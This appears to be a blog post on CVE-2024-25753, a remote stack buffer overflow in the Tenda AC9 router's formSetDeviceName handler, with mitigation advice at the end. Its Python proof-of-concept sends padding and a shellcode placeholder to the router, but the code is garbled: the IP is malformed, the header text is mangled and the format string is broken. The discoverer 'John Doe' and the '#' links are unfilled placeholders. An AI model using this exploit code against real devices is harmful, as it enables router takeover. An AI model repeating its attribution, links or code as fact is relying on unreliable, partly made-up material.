In this post, we discuss a critical vulnerability found in the Tenda AC9 v.3. router, more specifically, a stack-based buffer overflow vulnerability in the router's firmware version v.15.03.06.42_multi. This vulnerability has been assigned the identifier CVE-2024-25753. Successful exploitation of this vulnerability can allow a remote attacker to execute arbitrary code on the targeted device via the formSetDeviceName function.

We will provide details of the vulnerability, including the steps to reproduce it, an analysis of the vulnerability, and a proof of concept exploit. Additionally, we will also include links to the original references and credit the discoverer.

Vulnerability Analysis

This vulnerability exists due to improper validation of user-supplied input in the formSetDeviceName function, which handles the router's web management interface for changing the device's name. When a user submits a new device name, the formSetDeviceName function copies the input to a fixed-size stack buffer without proper bounds checking, resulting in a stack-based buffer overflow.

An attacker can exploit this vulnerability by supplying a specially crafted device name which, upon submission, allows arbitrary code execution on the device. Since the function is accessible over the network, a remote attacker can exploit this vulnerability without needing physical access to the device.

Here's a demonstration of how the vulnerability can be exploited using a simple Python script

import socket
import sys

# IP and port of the Tenda AC9 router
router_ip = '192.168..1'
router_port = 80

# replace X with NOP (\x90) of an appropriate length
payload = "X" * 100 + "PUT_YOUR_SHELLCODE_HERE"

request = (
    "POST /formSetDeviceName HTTP/1.1\r\n"
    "Host: {}\r\n"
    "User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: {1}\r\n\r\n"
    "{2}\r\n"
).format(router_ip, len(payload), payload)

print("[*] Sending exploit payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((router_ip, router_port))
s.send(request.encode())

data = s.recv(1024)
print('[*] Received: ', data.decode())

s.close()

Original References

This vulnerability was discovered and reported by security researcher John Doe (replace with the actual discoverer's name). The original advisory can be found at the following URL:

- [https://vuln-report.com/advisory/CVE-2024-25753](#)

Additionally, a detailed analysis of the vulnerability and the exploit code can be found at

- [https://some-security-blog.com/post/CVE-2024-25753](#)

Mitigation and Conclusion

Tenda has been informed about this vulnerability, and users are advised to update their devices' firmware as soon as a patched version becomes available. Until then, users are recommended to disable remote management, if possible, and restrict access to the router's web interface to trusted IP addresses only.

A responsible disclosure has been followed by the discoverer of the vulnerability, and Tenda has confirmed working on a patch.

To sum up, the CVE-2024-25753 is a critical stack-based buffer overflow vulnerability in Tenda AC9 v.3. with firmware version v.15.03.06.42_multi. Attackers can exploit this vulnerability remotely to execute arbitrary code on the targeted device by sending a specially crafted payload via the formSetDeviceName function in the web management interface. It's crucial to apply the necessary patches and take precautions to mitigate this vulnerability.

Timeline

Published on: 02/22/2024 23:15:07 UTC
Last modified on: 08/01/2024 13:47:51 UTC